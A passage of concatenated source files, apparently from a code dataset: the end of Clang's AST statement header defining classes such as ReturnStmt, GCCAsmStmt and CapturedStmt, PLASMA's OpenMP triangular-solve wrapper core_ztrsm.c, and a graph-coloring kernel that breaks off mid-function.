/// getConstantTarget - Returns the fixed target of this indirect
/// goto, if one exists.
LabelDecl *getConstantTarget();
const LabelDecl *getConstantTarget() const {
return const_cast<IndirectGotoStmt*>(this)->getConstantTarget();
}
SourceLocation getLocStart() const LLVM_READONLY { return GotoLoc; }
SourceLocation getLocEnd() const LLVM_READONLY { return Target->getLocEnd(); }
static bool classof(const Stmt *T) {
return T->getStmtClass() == IndirectGotoStmtClass;
}
// Iterators
child_range children() { return child_range(&Target, &Target+1); }
};
/// ContinueStmt - This represents a continue.
class ContinueStmt : public Stmt {
SourceLocation ContinueLoc;
public:
ContinueStmt(SourceLocation CL) : Stmt(ContinueStmtClass), ContinueLoc(CL) {}
/// \brief Build an empty continue statement.
explicit ContinueStmt(EmptyShell Empty) : Stmt(ContinueStmtClass, Empty) {}
SourceLocation getContinueLoc() const { return ContinueLoc; }
void setContinueLoc(SourceLocation L) { ContinueLoc = L; }
SourceLocation getLocStart() const LLVM_READONLY { return ContinueLoc; }
SourceLocation getLocEnd() const LLVM_READONLY { return ContinueLoc; }
static bool classof(const Stmt *T) {
return T->getStmtClass() == ContinueStmtClass;
}
// Iterators
child_range children() {
return child_range(child_iterator(), child_iterator());
}
};
/// BreakStmt - This represents a break.
class BreakStmt : public Stmt {
SourceLocation BreakLoc;
public:
BreakStmt(SourceLocation BL) : Stmt(BreakStmtClass), BreakLoc(BL) {
static_assert(sizeof(BreakStmt) == 2 * sizeof(SourceLocation),
"BreakStmt too large");
}
/// \brief Build an empty break statement.
explicit BreakStmt(EmptyShell Empty) : Stmt(BreakStmtClass, Empty) {}
SourceLocation getBreakLoc() const { return BreakLoc; }
void setBreakLoc(SourceLocation L) { BreakLoc = L; }
SourceLocation getLocStart() const LLVM_READONLY { return BreakLoc; }
SourceLocation getLocEnd() const LLVM_READONLY { return BreakLoc; }
static bool classof(const Stmt *T) {
return T->getStmtClass() == BreakStmtClass;
}
// Iterators
child_range children() {
return child_range(child_iterator(), child_iterator());
}
};
/// ReturnStmt - This represents a return, optionally of an expression:
/// return;
/// return 4;
///
/// Note that GCC allows return with no argument in a function declared to
/// return a value, and it allows returning a value in functions declared to
/// return void. We explicitly model this in the AST, which means you can't
/// depend on the return type of the function and the presence of an argument.
class ReturnStmt : public Stmt {
SourceLocation RetLoc;
Stmt *RetExpr;
const VarDecl *NRVOCandidate;
public:
explicit ReturnStmt(SourceLocation RL) : ReturnStmt(RL, nullptr, nullptr) {}
ReturnStmt(SourceLocation RL, Expr *E, const VarDecl *NRVOCandidate)
: Stmt(ReturnStmtClass), RetLoc(RL), RetExpr((Stmt *)E),
NRVOCandidate(NRVOCandidate) {}
/// \brief Build an empty return expression.
explicit ReturnStmt(EmptyShell Empty) : Stmt(ReturnStmtClass, Empty) {}
const Expr *getRetValue() const;
Expr *getRetValue();
void setRetValue(Expr *E) { RetExpr = reinterpret_cast<Stmt*>(E); }
SourceLocation getReturnLoc() const { return RetLoc; }
void setReturnLoc(SourceLocation L) { RetLoc = L; }
/// \brief Retrieve the variable that might be used for the named return
/// value optimization.
///
/// The optimization itself can only be performed if the variable is
/// also marked as an NRVO object.
const VarDecl *getNRVOCandidate() const { return NRVOCandidate; }
void setNRVOCandidate(const VarDecl *Var) { NRVOCandidate = Var; }
SourceLocation getLocStart() const LLVM_READONLY { return RetLoc; }
SourceLocation getLocEnd() const LLVM_READONLY {
return RetExpr ? RetExpr->getLocEnd() : RetLoc;
}
static bool classof(const Stmt *T) {
return T->getStmtClass() == ReturnStmtClass;
}
// Iterators
child_range children() {
if (RetExpr) return child_range(&RetExpr, &RetExpr+1);
return child_range(child_iterator(), child_iterator());
}
};
/// AsmStmt is the base class for GCCAsmStmt and MSAsmStmt.
class AsmStmt : public Stmt {
protected:
friend class ASTStmtReader;
SourceLocation AsmLoc;
/// \brief True if the assembly statement does not have any input or output
/// operands.
bool IsSimple;
/// \brief If true, treat this inline assembly as having side effects.
/// This assembly statement should not be optimized, deleted or moved.
bool IsVolatile;
unsigned NumOutputs;
unsigned NumInputs;
unsigned NumClobbers;
Stmt **Exprs = nullptr;
AsmStmt(StmtClass SC, SourceLocation asmloc, bool issimple, bool isvolatile,
unsigned numoutputs, unsigned numinputs, unsigned numclobbers)
: Stmt (SC), AsmLoc(asmloc), IsSimple(issimple), IsVolatile(isvolatile),
NumOutputs(numoutputs), NumInputs(numinputs),
NumClobbers(numclobbers) {}
public:
/// \brief Build an empty inline-assembly statement.
explicit AsmStmt(StmtClass SC, EmptyShell Empty) : Stmt(SC, Empty) {}
SourceLocation getAsmLoc() const { return AsmLoc; }
void setAsmLoc(SourceLocation L) { AsmLoc = L; }
bool isSimple() const { return IsSimple; }
void setSimple(bool V) { IsSimple = V; }
bool isVolatile() const { return IsVolatile; }
void setVolatile(bool V) { IsVolatile = V; }
SourceLocation getLocStart() const LLVM_READONLY { return SourceLocation(); }
SourceLocation getLocEnd() const LLVM_READONLY { return SourceLocation(); }
//===--- Asm String Analysis ---===//
/// Assemble final IR asm string.
std::string generateAsmString(const ASTContext &C) const;
//===--- Output operands ---===//
unsigned getNumOutputs() const { return NumOutputs; }
/// getOutputConstraint - Return the constraint string for the specified
/// output operand. All output constraints are known to be non-empty (either
/// '=' or '+').
StringRef getOutputConstraint(unsigned i) const;
/// isOutputPlusConstraint - Return true if the specified output constraint
/// is a "+" constraint (which is both an input and an output) or false if it
/// is an "=" constraint (just an output).
bool isOutputPlusConstraint(unsigned i) const {
return getOutputConstraint(i)[0] == '+';
}
const Expr *getOutputExpr(unsigned i) const;
/// getNumPlusOperands - Return the number of output operands that have a "+"
/// constraint.
unsigned getNumPlusOperands() const;
//===--- Input operands ---===//
unsigned getNumInputs() const { return NumInputs; }
/// getInputConstraint - Return the specified input constraint. Unlike output
/// constraints, these can be empty.
StringRef getInputConstraint(unsigned i) const;
const Expr *getInputExpr(unsigned i) const;
//===--- Other ---===//
unsigned getNumClobbers() const { return NumClobbers; }
StringRef getClobber(unsigned i) const;
static bool classof(const Stmt *T) {
return T->getStmtClass() == GCCAsmStmtClass ||
T->getStmtClass() == MSAsmStmtClass;
}
// Input expr iterators.
using inputs_iterator = ExprIterator;
using const_inputs_iterator = ConstExprIterator;
using inputs_range = llvm::iterator_range<inputs_iterator>;
using inputs_const_range = llvm::iterator_range<const_inputs_iterator>;
inputs_iterator begin_inputs() {
return &Exprs[0] + NumOutputs;
}
inputs_iterator end_inputs() {
return &Exprs[0] + NumOutputs + NumInputs;
}
inputs_range inputs() { return inputs_range(begin_inputs(), end_inputs()); }
const_inputs_iterator begin_inputs() const {
return &Exprs[0] + NumOutputs;
}
const_inputs_iterator end_inputs() const {
return &Exprs[0] + NumOutputs + NumInputs;
}
inputs_const_range inputs() const {
return inputs_const_range(begin_inputs(), end_inputs());
}
// Output expr iterators.
using outputs_iterator = ExprIterator;
using const_outputs_iterator = ConstExprIterator;
using outputs_range = llvm::iterator_range<outputs_iterator>;
using outputs_const_range = llvm::iterator_range<const_outputs_iterator>;
outputs_iterator begin_outputs() {
return &Exprs[0];
}
outputs_iterator end_outputs() {
return &Exprs[0] + NumOutputs;
}
outputs_range outputs() {
return outputs_range(begin_outputs(), end_outputs());
}
const_outputs_iterator begin_outputs() const {
return &Exprs[0];
}
const_outputs_iterator end_outputs() const {
return &Exprs[0] + NumOutputs;
}
outputs_const_range outputs() const {
return outputs_const_range(begin_outputs(), end_outputs());
}
child_range children() {
return child_range(&Exprs[0], &Exprs[0] + NumOutputs + NumInputs);
}
};
/// This represents a GCC inline-assembly statement extension.
class GCCAsmStmt : public AsmStmt {
friend class ASTStmtReader;
SourceLocation RParenLoc;
StringLiteral *AsmStr;
// FIXME: If we wanted to, we could allocate all of these in one big array.
StringLiteral **Constraints = nullptr;
StringLiteral **Clobbers = nullptr;
IdentifierInfo **Names = nullptr;
public:
GCCAsmStmt(const ASTContext &C, SourceLocation asmloc, bool issimple,
bool isvolatile, unsigned numoutputs, unsigned numinputs,
IdentifierInfo **names, StringLiteral **constraints, Expr **exprs,
StringLiteral *asmstr, unsigned numclobbers,
StringLiteral **clobbers, SourceLocation rparenloc);
/// \brief Build an empty inline-assembly statement.
explicit GCCAsmStmt(EmptyShell Empty) : AsmStmt(GCCAsmStmtClass, Empty) {}
SourceLocation getRParenLoc() const { return RParenLoc; }
void setRParenLoc(SourceLocation L) { RParenLoc = L; }
//===--- Asm String Analysis ---===//
const StringLiteral *getAsmString() const { return AsmStr; }
StringLiteral *getAsmString() { return AsmStr; }
void setAsmString(StringLiteral *E) { AsmStr = E; }
/// AsmStringPiece - this is part of a decomposed asm string specification
/// (for use with the AnalyzeAsmString function below). An asm string is
/// considered to be a concatenation of these parts.
class AsmStringPiece {
public:
enum Kind {
String, // String in .ll asm string form, "$" -> "$$" and "%%" -> "%".
Operand // Operand reference, with optional modifier %c4.
};
private:
Kind MyKind;
std::string Str;
unsigned OperandNo;
// Source range for operand references.
CharSourceRange Range;
public:
AsmStringPiece(const std::string &S) : MyKind(String), Str(S) {}
AsmStringPiece(unsigned OpNo, const std::string &S, SourceLocation Begin,
SourceLocation End)
: MyKind(Operand), Str(S), OperandNo(OpNo),
Range(CharSourceRange::getCharRange(Begin, End)) {}
bool isString() const { return MyKind == String; }
bool isOperand() const { return MyKind == Operand; }
const std::string &getString() const {
return Str;
}
unsigned getOperandNo() const {
assert(isOperand());
return OperandNo;
}
CharSourceRange getRange() const {
assert(isOperand() && "Range is currently used only for Operands.");
return Range;
}
/// getModifier - Get the modifier for this operand, if present. This
/// returns '\0' if there was no modifier.
char getModifier() const;
};
/// AnalyzeAsmString - Analyze the asm string of the current asm, decomposing
/// it into pieces. If the asm string is erroneous, emit errors and return
/// true, otherwise return false. This handles canonicalization and
/// translation of strings from GCC syntax to LLVM IR syntax, and handles
//// flattening of named references like %[foo] to Operand AsmStringPiece's.
unsigned AnalyzeAsmString(SmallVectorImpl<AsmStringPiece> &Pieces,
const ASTContext &C, unsigned &DiagOffs) const;
/// Assemble final IR asm string.
std::string generateAsmString(const ASTContext &C) const;
//===--- Output operands ---===//
IdentifierInfo *getOutputIdentifier(unsigned i) const {
return Names[i];
}
StringRef getOutputName(unsigned i) const {
if (IdentifierInfo *II = getOutputIdentifier(i))
return II->getName();
return StringRef();
}
StringRef getOutputConstraint(unsigned i) const;
const StringLiteral *getOutputConstraintLiteral(unsigned i) const {
return Constraints[i];
}
StringLiteral *getOutputConstraintLiteral(unsigned i) {
return Constraints[i];
}
Expr *getOutputExpr(unsigned i);
const Expr *getOutputExpr(unsigned i) const {
return const_cast<GCCAsmStmt*>(this)->getOutputExpr(i);
}
//===--- Input operands ---===//
IdentifierInfo *getInputIdentifier(unsigned i) const {
return Names[i + NumOutputs];
}
StringRef getInputName(unsigned i) const {
if (IdentifierInfo *II = getInputIdentifier(i))
return II->getName();
return StringRef();
}
StringRef getInputConstraint(unsigned i) const;
const StringLiteral *getInputConstraintLiteral(unsigned i) const {
return Constraints[i + NumOutputs];
}
StringLiteral *getInputConstraintLiteral(unsigned i) {
return Constraints[i + NumOutputs];
}
Expr *getInputExpr(unsigned i);
void setInputExpr(unsigned i, Expr *E);
const Expr *getInputExpr(unsigned i) const {
return const_cast<GCCAsmStmt*>(this)->getInputExpr(i);
}
private:
void setOutputsAndInputsAndClobbers(const ASTContext &C,
IdentifierInfo **Names,
StringLiteral **Constraints,
Stmt **Exprs,
unsigned NumOutputs,
unsigned NumInputs,
StringLiteral **Clobbers,
unsigned NumClobbers);
public:
//===--- Other ---===//
/// getNamedOperand - Given a symbolic operand reference like %[foo],
/// translate this into a numeric value needed to reference the same operand.
/// This returns -1 if the operand name is invalid.
int getNamedOperand(StringRef SymbolicName) const;
StringRef getClobber(unsigned i) const;
StringLiteral *getClobberStringLiteral(unsigned i) { return Clobbers[i]; }
const StringLiteral *getClobberStringLiteral(unsigned i) const {
return Clobbers[i];
}
SourceLocation getLocStart() const LLVM_READONLY { return AsmLoc; }
SourceLocation getLocEnd() const LLVM_READONLY { return RParenLoc; }
static bool classof(const Stmt *T) {
return T->getStmtClass() == GCCAsmStmtClass;
}
};
/// This represents a Microsoft inline-assembly statement extension.
class MSAsmStmt : public AsmStmt {
friend class ASTStmtReader;
SourceLocation LBraceLoc, EndLoc;
StringRef AsmStr;
unsigned NumAsmToks = 0;
Token *AsmToks = nullptr;
StringRef *Constraints = nullptr;
StringRef *Clobbers = nullptr;
public:
MSAsmStmt(const ASTContext &C, SourceLocation asmloc,
SourceLocation lbraceloc, bool issimple, bool isvolatile,
ArrayRef<Token> asmtoks, unsigned numoutputs, unsigned numinputs,
ArrayRef<StringRef> constraints,
ArrayRef<Expr*> exprs, StringRef asmstr,
ArrayRef<StringRef> clobbers, SourceLocation endloc);
/// \brief Build an empty MS-style inline-assembly statement.
explicit MSAsmStmt(EmptyShell Empty) : AsmStmt(MSAsmStmtClass, Empty) {}
SourceLocation getLBraceLoc() const { return LBraceLoc; }
void setLBraceLoc(SourceLocation L) { LBraceLoc = L; }
SourceLocation getEndLoc() const { return EndLoc; }
void setEndLoc(SourceLocation L) { EndLoc = L; }
bool hasBraces() const { return LBraceLoc.isValid(); }
unsigned getNumAsmToks() { return NumAsmToks; }
Token *getAsmToks() { return AsmToks; }
//===--- Asm String Analysis ---===//
StringRef getAsmString() const { return AsmStr; }
/// Assemble final IR asm string.
std::string generateAsmString(const ASTContext &C) const;
//===--- Output operands ---===//
StringRef getOutputConstraint(unsigned i) const {
assert(i < NumOutputs);
return Constraints[i];
}
Expr *getOutputExpr(unsigned i);
const Expr *getOutputExpr(unsigned i) const {
return const_cast<MSAsmStmt*>(this)->getOutputExpr(i);
}
//===--- Input operands ---===//
StringRef getInputConstraint(unsigned i) const {
assert(i < NumInputs);
return Constraints[i + NumOutputs];
}
Expr *getInputExpr(unsigned i);
void setInputExpr(unsigned i, Expr *E);
const Expr *getInputExpr(unsigned i) const {
return const_cast<MSAsmStmt*>(this)->getInputExpr(i);
}
//===--- Other ---===//
ArrayRef<StringRef> getAllConstraints() const {
return llvm::makeArrayRef(Constraints, NumInputs + NumOutputs);
}
ArrayRef<StringRef> getClobbers() const {
return llvm::makeArrayRef(Clobbers, NumClobbers);
}
ArrayRef<Expr*> getAllExprs() const {
return llvm::makeArrayRef(reinterpret_cast<Expr**>(Exprs),
NumInputs + NumOutputs);
}
StringRef getClobber(unsigned i) const { return getClobbers()[i]; }
private:
void initialize(const ASTContext &C, StringRef AsmString,
ArrayRef<Token> AsmToks, ArrayRef<StringRef> Constraints,
ArrayRef<Expr*> Exprs, ArrayRef<StringRef> Clobbers);
public:
SourceLocation getLocStart() const LLVM_READONLY { return AsmLoc; }
SourceLocation getLocEnd() const LLVM_READONLY { return EndLoc; }
static bool classof(const Stmt *T) {
return T->getStmtClass() == MSAsmStmtClass;
}
child_range children() {
return child_range(&Exprs[0], &Exprs[NumInputs + NumOutputs]);
}
};
class SEHExceptStmt : public Stmt {
friend class ASTReader;
friend class ASTStmtReader;
SourceLocation Loc;
Stmt *Children[2];
enum { FILTER_EXPR, BLOCK };
SEHExceptStmt(SourceLocation Loc, Expr *FilterExpr, Stmt *Block);
explicit SEHExceptStmt(EmptyShell E) : Stmt(SEHExceptStmtClass, E) {}
public:
static SEHExceptStmt* Create(const ASTContext &C,
SourceLocation ExceptLoc,
Expr *FilterExpr,
Stmt *Block);
SourceLocation getLocStart() const LLVM_READONLY { return getExceptLoc(); }
SourceLocation getLocEnd() const LLVM_READONLY { return getEndLoc(); }
SourceLocation getExceptLoc() const { return Loc; }
SourceLocation getEndLoc() const { return getBlock()->getLocEnd(); }
Expr *getFilterExpr() const {
return reinterpret_cast<Expr*>(Children[FILTER_EXPR]);
}
CompoundStmt *getBlock() const {
return cast<CompoundStmt>(Children[BLOCK]);
}
child_range children() {
return child_range(Children,Children+2);
}
static bool classof(const Stmt *T) {
return T->getStmtClass() == SEHExceptStmtClass;
}
};
class SEHFinallyStmt : public Stmt {
friend class ASTReader;
friend class ASTStmtReader;
SourceLocation Loc;
Stmt *Block;
SEHFinallyStmt(SourceLocation Loc, Stmt *Block);
explicit SEHFinallyStmt(EmptyShell E) : Stmt(SEHFinallyStmtClass, E) {}
public:
static SEHFinallyStmt* Create(const ASTContext &C,
SourceLocation FinallyLoc,
Stmt *Block);
SourceLocation getLocStart() const LLVM_READONLY { return getFinallyLoc(); }
SourceLocation getLocEnd() const LLVM_READONLY { return getEndLoc(); }
SourceLocation getFinallyLoc() const { return Loc; }
SourceLocation getEndLoc() const { return Block->getLocEnd(); }
CompoundStmt *getBlock() const { return cast<CompoundStmt>(Block); }
child_range children() {
return child_range(&Block,&Block+1);
}
static bool classof(const Stmt *T) {
return T->getStmtClass() == SEHFinallyStmtClass;
}
};
class SEHTryStmt : public Stmt {
friend class ASTReader;
friend class ASTStmtReader;
bool IsCXXTry;
SourceLocation TryLoc;
Stmt *Children[2];
enum { TRY = 0, HANDLER = 1 };
SEHTryStmt(bool isCXXTry, // true if 'try' otherwise '__try'
SourceLocation TryLoc,
Stmt *TryBlock,
Stmt *Handler);
explicit SEHTryStmt(EmptyShell E) : Stmt(SEHTryStmtClass, E) {}
public:
static SEHTryStmt* Create(const ASTContext &C, bool isCXXTry,
SourceLocation TryLoc, Stmt *TryBlock,
Stmt *Handler);
SourceLocation getLocStart() const LLVM_READONLY { return getTryLoc(); }
SourceLocation getLocEnd() const LLVM_READONLY { return getEndLoc(); }
SourceLocation getTryLoc() const { return TryLoc; }
SourceLocation getEndLoc() const { return Children[HANDLER]->getLocEnd(); }
bool getIsCXXTry() const { return IsCXXTry; }
CompoundStmt* getTryBlock() const {
return cast<CompoundStmt>(Children[TRY]);
}
Stmt *getHandler() const { return Children[HANDLER]; }
/// Returns 0 if not defined
SEHExceptStmt *getExceptHandler() const;
SEHFinallyStmt *getFinallyHandler() const;
child_range children() {
return child_range(Children,Children+2);
}
static bool classof(const Stmt *T) {
return T->getStmtClass() == SEHTryStmtClass;
}
};
/// Represents a __leave statement.
class SEHLeaveStmt : public Stmt {
SourceLocation LeaveLoc;
public:
explicit SEHLeaveStmt(SourceLocation LL)
: Stmt(SEHLeaveStmtClass), LeaveLoc(LL) {}
/// \brief Build an empty __leave statement.
explicit SEHLeaveStmt(EmptyShell Empty) : Stmt(SEHLeaveStmtClass, Empty) {}
SourceLocation getLeaveLoc() const { return LeaveLoc; }
void setLeaveLoc(SourceLocation L) { LeaveLoc = L; }
SourceLocation getLocStart() const LLVM_READONLY { return LeaveLoc; }
SourceLocation getLocEnd() const LLVM_READONLY { return LeaveLoc; }
static bool classof(const Stmt *T) {
return T->getStmtClass() == SEHLeaveStmtClass;
}
// Iterators
child_range children() {
return child_range(child_iterator(), child_iterator());
}
};
/// \brief This captures a statement into a function. For example, the following
/// pragma annotated compound statement can be represented as a CapturedStmt,
/// and this compound statement is the body of an anonymous outlined function.
/// @code
/// #pragma omp parallel
/// {
/// compute();
/// }
/// @endcode
class CapturedStmt : public Stmt {
public:
/// \brief The different capture forms: by 'this', by reference, capture for
/// variable-length array type etc.
enum VariableCaptureKind {
VCK_This,
VCK_ByRef,
VCK_ByCopy,
VCK_VLAType,
};
/// \brief Describes the capture of either a variable, or 'this', or
/// variable-length array type.
class Capture {
llvm::PointerIntPair<VarDecl *, 2, VariableCaptureKind> VarAndKind;
SourceLocation Loc;
public:
friend class ASTStmtReader;
/// \brief Create a new capture.
///
/// \param Loc The source location associated with this capture.
///
/// \param Kind The kind of capture (this, ByRef, ...).
///
/// \param Var The variable being captured, or null if capturing this.
Capture(SourceLocation Loc, VariableCaptureKind Kind,
VarDecl *Var = nullptr);
/// \brief Determine the kind of capture.
VariableCaptureKind getCaptureKind() const;
/// \brief Retrieve the source location at which the variable or 'this' was
/// first used.
SourceLocation getLocation() const { return Loc; }
/// \brief Determine whether this capture handles the C++ 'this' pointer.
bool capturesThis() const { return getCaptureKind() == VCK_This; }
/// \brief Determine whether this capture handles a variable (by reference).
bool capturesVariable() const { return getCaptureKind() == VCK_ByRef; }
/// \brief Determine whether this capture handles a variable by copy.
bool capturesVariableByCopy() const {
return getCaptureKind() == VCK_ByCopy;
}
/// \brief Determine whether this capture handles a variable-length array
/// type.
bool capturesVariableArrayType() const {
return getCaptureKind() == VCK_VLAType;
}
/// \brief Retrieve the declaration of the variable being captured.
///
/// This operation is only valid if this capture captures a variable.
VarDecl *getCapturedVar() const;
};
private:
/// \brief The number of variable captured, including 'this'.
unsigned NumCaptures;
/// \brief The pointer part is the implicit the outlined function and the
/// int part is the captured region kind, 'CR_Default' etc.
llvm::PointerIntPair<CapturedDecl *, 1, CapturedRegionKind> CapDeclAndKind;
/// \brief The record for captured variables, a RecordDecl or CXXRecordDecl.
RecordDecl *TheRecordDecl = nullptr;
/// \brief Construct a captured statement.
CapturedStmt(Stmt *S, CapturedRegionKind Kind, ArrayRef<Capture> Captures,
ArrayRef<Expr *> CaptureInits, CapturedDecl *CD, RecordDecl *RD);
/// \brief Construct an empty captured statement.
CapturedStmt(EmptyShell Empty, unsigned NumCaptures);
Stmt **getStoredStmts() { return reinterpret_cast<Stmt **>(this + 1); }
Stmt *const *getStoredStmts() const {
return reinterpret_cast<Stmt *const *>(this + 1);
}
Capture *getStoredCaptures() const;
void setCapturedStmt(Stmt *S) { getStoredStmts()[NumCaptures] = S; }
public:
friend class ASTStmtReader;
static CapturedStmt *Create(const ASTContext &Context, Stmt *S,
CapturedRegionKind Kind,
ArrayRef<Capture> Captures,
ArrayRef<Expr *> CaptureInits,
CapturedDecl *CD, RecordDecl *RD);
static CapturedStmt *CreateDeserialized(const ASTContext &Context,
unsigned NumCaptures);
/// \brief Retrieve the statement being captured.
Stmt *getCapturedStmt() { return getStoredStmts()[NumCaptures]; }
const Stmt *getCapturedStmt() const { return getStoredStmts()[NumCaptures]; }
/// \brief Retrieve the outlined function declaration.
CapturedDecl *getCapturedDecl();
const CapturedDecl *getCapturedDecl() const;
/// \brief Set the outlined function declaration.
void setCapturedDecl(CapturedDecl *D);
/// \brief Retrieve the captured region kind.
CapturedRegionKind getCapturedRegionKind() const;
/// \brief Set the captured region kind.
void setCapturedRegionKind(CapturedRegionKind Kind);
/// \brief Retrieve the record declaration for captured variables.
const RecordDecl *getCapturedRecordDecl() const { return TheRecordDecl; }
/// \brief Set the record declaration for captured variables.
void setCapturedRecordDecl(RecordDecl *D) {
assert(D && "null RecordDecl");
TheRecordDecl = D;
}
/// \brief True if this variable has been captured.
bool capturesVariable(const VarDecl *Var) const;
/// \brief An iterator that walks over the captures.
using capture_iterator = Capture *;
using const_capture_iterator = const Capture *;
using capture_range = llvm::iterator_range<capture_iterator>;
using capture_const_range = llvm::iterator_range<const_capture_iterator>;
capture_range captures() {
return capture_range(capture_begin(), capture_end());
}
capture_const_range captures() const {
return capture_const_range(capture_begin(), capture_end());
}
/// \brief Retrieve an iterator pointing to the first capture.
capture_iterator capture_begin() { return getStoredCaptures(); }
const_capture_iterator capture_begin() const { return getStoredCaptures(); }
/// \brief Retrieve an iterator pointing past the end of the sequence of
/// captures.
capture_iterator capture_end() const {
return getStoredCaptures() + NumCaptures;
}
/// \brief Retrieve the number of captures, including 'this'.
unsigned capture_size() const { return NumCaptures; }
/// \brief Iterator that walks over the capture initialization arguments.
using capture_init_iterator = Expr **;
using capture_init_range = llvm::iterator_range<capture_init_iterator>;
/// \brief Const iterator that walks over the capture initialization
/// arguments.
using const_capture_init_iterator = Expr *const *;
using const_capture_init_range =
llvm::iterator_range<const_capture_init_iterator>;
capture_init_range capture_inits() {
return capture_init_range(capture_init_begin(), capture_init_end());
}
const_capture_init_range capture_inits() const {
return const_capture_init_range(capture_init_begin(), capture_init_end());
}
/// \brief Retrieve the first initialization argument.
capture_init_iterator capture_init_begin() {
return reinterpret_cast<Expr **>(getStoredStmts());
}
const_capture_init_iterator capture_init_begin() const {
return reinterpret_cast<Expr *const *>(getStoredStmts());
}
/// \brief Retrieve the iterator pointing one past the last initialization
/// argument.
capture_init_iterator capture_init_end() {
return capture_init_begin() + NumCaptures;
}
const_capture_init_iterator capture_init_end() const {
return capture_init_begin() + NumCaptures;
}
SourceLocation getLocStart() const LLVM_READONLY {
return getCapturedStmt()->getLocStart();
}
SourceLocation getLocEnd() const LLVM_READONLY {
return getCapturedStmt()->getLocEnd();
}
SourceRange getSourceRange() const LLVM_READONLY {
return getCapturedStmt()->getSourceRange();
}
static bool classof(const Stmt *T) {
return T->getStmtClass() == CapturedStmtClass;
}
child_range children();
};
} // namespace clang
#endif // LLVM_CLANG_AST_STMT_H
|
core_ztrsm.c | /**
*
* @file
*
* PLASMA is a software package provided by:
* University of Tennessee, US,
* University of Manchester, UK.
*
* @precisions normal z -> c d s
*
**/
#include <plasma_core_blas.h>
#include "plasma_types.h"
#include "core_lapack.h"
/***************************************************************************//**
*
* @ingroup core_trsm
*
* Solves one of the matrix equations
*
* \f[ op( A )\times X = \alpha B, \f] or
* \f[ X \times op( A ) = \alpha B, \f]
*
* where op( A ) is one of:
* \f[ op( A ) = A, \f]
* \f[ op( A ) = A^T, \f]
* \f[ op( A ) = A^H, \f]
*
* alpha is a scalar, X and B are m-by-n matrices, and
* A is a unit or non-unit, upper or lower triangular matrix.
* The matrix X overwrites B.
*
*******************************************************************************
*
* @param[in] side
* - PlasmaLeft: op(A)*X = B,
* - PlasmaRight: X*op(A) = B.
*
* @param[in] uplo
* - PlasmaUpper: A is upper triangular,
* - PlasmaLower: A is lower triangular.
*
* @param[in] transa
* - PlasmaNoTrans: A is not transposed,
* - PlasmaTrans: A is transposed,
* - PlasmaConjTrans: A is conjugate transposed.
*
* @param[in] diag
* - PlasmaNonUnit: A has non-unit diagonal,
* - PlasmaUnit: A has unit diagonal.
*
* @param[in] m
* The number of rows of the matrix B. m >= 0.
*
* @param[in] n
* The number of columns of the matrix B. n >= 0.
*
* @param[in] alpha
* The scalar alpha.
*
* @param[in] A
* The lda-by-ka triangular matrix,
* where ka = m if side = PlasmaLeft,
* and ka = n if side = PlasmaRight.
* If uplo = PlasmaUpper, the leading k-by-k upper triangular part
* of the array A contains the upper triangular matrix, and the
* strictly lower triangular part of A is not referenced.
* If uplo = PlasmaLower, the leading k-by-k lower triangular part
* of the array A contains the lower triangular matrix, and the
* strictly upper triangular part of A is not referenced.
* If diag = PlasmaUnit, the diagonal elements of A are also not
* referenced and are assumed to be 1.
*
* @param[in] lda
* The leading dimension of the array A. lda >= max(1,k).
*
* @param[in,out] B
* On entry, the ldb-by-n right hand side matrix B.
* On exit, if return value = 0, the ldb-by-n solution matrix X.
*
* @param[in] ldb
* The leading dimension of the array B. ldb >= max(1,m).
*
******************************************************************************/
__attribute__((weak))
void plasma_core_ztrsm(plasma_enum_t side, plasma_enum_t uplo,
plasma_enum_t transa, plasma_enum_t diag,
int m, int n,
plasma_complex64_t alpha, const plasma_complex64_t *A, int lda,
plasma_complex64_t *B, int ldb)
{
cblas_ztrsm(CblasColMajor,
(CBLAS_SIDE)side, (CBLAS_UPLO)uplo,
(CBLAS_TRANSPOSE)transa, (CBLAS_DIAG)diag,
m, n,
CBLAS_SADDR(alpha), A, lda,
B, ldb);
}
/******************************************************************************/
void plasma_core_omp_ztrsm(
plasma_enum_t side, plasma_enum_t uplo,
plasma_enum_t transa, plasma_enum_t diag,
int m, int n,
plasma_complex64_t alpha, const plasma_complex64_t *A, int lda,
plasma_complex64_t *B, int ldb,
plasma_sequence_t *sequence, plasma_request_t *request)
{
int ak;
if (side == PlasmaLeft)
ak = m;
else
ak = n;
#pragma omp task depend(in:A[0:lda*ak]) \
depend(inout:B[0:ldb*n])
{
if (sequence->status == PlasmaSuccess)
plasma_core_ztrsm(side, uplo,
transa, diag,
m, n,
alpha, A, lda,
B, ldb);
}
}
|
kernel1.h | /*
#include "worklist.h"
#include <vector>
#include <set>
using namespace std;
*/
#define MAXCOLOR 128
void FirstFit(int m, int nnz, int *csrRowPtr, int *csrColInd, Worklist &inwl, int *coloring)
{
unsigned start, end;
int ii;
start = inwl.start;
end = inwl.end;
#ifdef ENABLE_OPENMP
#pragma omp parallel for
#endif
for (ii = start; ii < end; ii++) {
int j, node, neighbors, neighbor_j;
node = inwl.getItem(ii);
int neighboroffset = csrRowPtr[node];
neighbors = csrRowPtr[node + 1] - neighboroffset;
unsigned v[MAXCOLOR / 32];
v[0] = 0xfffffffe;
for (j = 1; j < MAXCOLOR / 32; j++)
v[j] = 0xffffffff;
for (j = 0; j < neighbors; j++) {
neighbor_j = csrColInd[neighboroffset + j];
int color_j = coloring[neighbor_j];
if (color_j)
v[color_j / 32] &= ~(1 << (color_j % 32));
}
int c = 32;
for (int i = 0; i < MAXCOLOR / 32; i++) {
if (v[i] != 0) {
v[i] &= -(signed)v[i];
if (v[i]) c--;
if (v[i] & 0x0000ffff) c -= 16;
if (v[i] & 0x00ff00ff) c -= 8;
if (v[i] & 0x0f0f0f0f) c -= 4;
if (v[i] & 0x33333333) c -= 2;
if (v[i] & 0x55555555) c -= 1;
break;
}
else
c += 32;
}
coloring[node] = c;
}
}
void conflictDetect(int m, int nnz, int *csrRowPtr, int *csrColInd, Worklist &inwl, Worklist &outwl, int *coloring)
{
unsigned start, end;
int ii;
//inwl.myItems(start, end);
start = inwl.start;
end = inwl.end;
//printf("inwl=%d, outwl=%d, start=%d, end=%d\n", inwl.getSize(), outwl.getSize(), start, end);
#ifdef ENABLE_OPENMP
#pragma omp parallel for
#endif
for (ii = start; ii < end; ii++) {
int j, node, neighbors, neighbor_j;
node = inwl.getItem(ii);
//if (node == -1)
//continue;
int neighboroffset = csrRowPtr[node];
neighbors = csrRowPtr[node + 1] - neighboroffset;
//neighbors = graph.noutgoing[node];
for (j = 0; j < neighbors; j++) {
